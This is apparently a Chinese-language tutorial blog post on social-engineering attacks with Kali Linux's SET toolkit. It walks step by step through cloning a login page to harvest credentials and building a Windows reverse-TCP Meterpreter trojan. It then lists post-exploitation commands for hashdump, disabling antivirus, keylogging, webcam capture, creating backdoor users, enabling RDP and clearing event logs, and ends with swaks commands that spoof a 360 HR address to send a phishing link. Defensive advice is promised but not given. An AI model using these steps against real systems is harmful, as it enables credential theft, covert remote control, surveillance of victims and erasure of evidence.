赞
踩
目录
社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。
Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由David Kenned设计,而且已经成为业界部署实施社会工程学攻击的标准。
SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。
1.kali启动SET
或者在终端输入setoolkit命令
1) Social-Engineering Attacks:社会工程学攻击
2) Penetration Testing (Fast- Track):快速追踪渗透测试
3) Third Party Modules:第三方模块
4) Update the Social-Engineer Toolkit:更新SET
5) Update SET configuration:升级SET的配置(每次设置完set.config需要)
6) Help, Credits, and About: SET使用帮助及 相关信息
99) Exit the Social-Engineer Toolkit:退出SET
2.选择菜单第1项:Social-Engineering Attacks:社会工程学攻击
Spear-Phishing Attack Vectors --鱼叉式网络钓鱼攻击载体
Website Attack Vectors --网站攻击向量
Infectious Media Generator --传染源
Create a Payload and Listener --创建负载和侦听器
Mass Mailer Attack --群发邮件攻击
Arduino-Based Attack Vector --基于 Arduino 的攻击向量
Wireless Access Point Attack Vector --无线接入点攻击向量
QRCode Generator Attack Vector --qrcode 生成器攻击向量
Powershell Attack Vectors --powershell 攻击向量
SMS Spoofing Attack Vector --短信欺骗攻击向量
Third Party Modules --第三方模块
Return back to the main menu. --返回主菜单
步骤1:选择菜单第1项:Social-Engineering Attacks:社会工程学攻击
步骤2:继续选择菜单第2项:Website Attack Vectors(网站攻击向量)
步骤3:继续选择菜单第5项:Web Jacking 攻击方法
Java Applet Attack Method – Java Applet 攻击方法
Metasploit Browser Exploit Method – Metasploit 浏览器利用方法
Credential Harvester Attack Method --凭证收割机攻击方法
Tabnabbing Attack Method --制表攻击方法
Web Jacking Attack Method --Web Jacking 攻击方法
Multi-Attack Web Method --多攻击 web 方法
Full Screen Attack Method --全屏攻击法HTA Attack Method – HTA 攻击方法
步骤4:继续选择菜单第2项:Site Cloner --页面克隆
- Web Templates --web 模板
- Site Cloner --页面克隆
- Custom Import --自定义导入
- Return to Webattack Menu
步骤5:要求您提供一个 IP 地址(Kali Linux 计算机的 IP 地址,攻击机的 IP)
步骤6:输入克隆的网址:http://www.testfire.net/login.jsp
打开网址:192.168.76.134 ,将克隆的网址发送给受害者即可
The site http://www.testfire.net/login.jspĀ has moved, click here to go to the new location.
步骤7:模拟受害机登录网站,输入用户名和密码并尝试登录,观察到攻击机SET界面成功监听到受害机的用户名和密码信息。
1、运行 SET,选择4.创建攻击载荷和监听器:
2、选择攻击模式2.Windows Reverse_TCP Meterpreter,然后设置监听的主机IP(kali攻击机的IP地址)和端口,即可在本地生成木马程序:
mv /root/.set/payload.exe /home/gyp-202031070222/桌面
3、将木马程序发送给 目标靶机,Kali攻击机开启监听后,Win 7虚拟机双击运行木马程序:
4、此时 Kali 攻击机启动了MSF框架并成功获得攻击会话:
5、激活 Meterpreter 会话,获得 Shell 后即可操控 Win 7 靶机,如下图所示:
- sessions -i 1
- //这个命令是针对 Metasploit Framework 的,sessions -i 1 的作用是切换到会话 ID 为 1 的会话。在 //Metasploit 中,当攻击成功后会生成一个新的会话,可以通过 sessions 命令来管理这些会话。使用 //sessions -l 命令可以列出当前所有的会话,会话 ID 可以从该命令输出中获取。然后通过 sessions -i //[SESSION ID] 命令来切换到对应的会话,开始进行后续操作。
运行了通过木马程序之后,我们开启了一个reverse TCP监听器来监听本地的 80 端口,即攻击者的本地主机地址(LHOST)和端口号(LPORT)。
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
clearev #清除事件日志
示例:
下面的模块主要用于在取得目标主机系统远程控制权后,进行一系列的后渗透攻击动作。
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
manrun post/windows/age/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run windows/gather/smart_hashdump #dump出所有用户的hash
1、为了不暴露攻击者的痕迹行为,需要清除系统事件,先打开 Windows 事件查看器:
2、在 Meterpreter 执行命令 clearev
命令,对靶机的日志进行清除,如下图所示:
3、此时重新查看 Win7 的事件查看器,系统日志信息已经被清空:
当攻击者制作了钓鱼网站、木马程序后,便会想法设法将其传给受害者,而常见的传播方式便是钓鱼网站了。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序,便可能遭受攻击!
工具简述
Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。
Swaks基本用法:
(这里只是简单的罗列了一些,至于更加具体的内容可以使用–help进行查看了解):
- --from test@qq.com //发件人邮箱;
- --ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证
- --body "http://www.baidu.com" //引号中的内容即为邮件正文;
- --header "Subject:hello" //邮件头信息,subject为邮件标题
- --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;
如下图所示:
https://temp-mail.org/zh/view/646211846ea2510c5c1d87b5
收件人为segefeh529@jwsuns.com,内容为:“Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php”,如下图所示:
swaks --to segefeh529@jwsuns.com --from hr@360.cn --ehlo 360.cn --body "Congratulations on your 360 interview. Please click on the link below to enter our employee information page. https://fishing.com/test.php"
但是,QQ邮箱和网易云邮箱暂不可送达,应该是腾讯、网易设定的安全机制的原因!在此提醒遇到可疑邮件要查看源邮件,判断发信人IP是否为可信任的IP,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!
废话不多说,给出几条防范社工攻击的建议:
最后,本文仅限于技术讨论与分享,严禁用于非法途径……
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。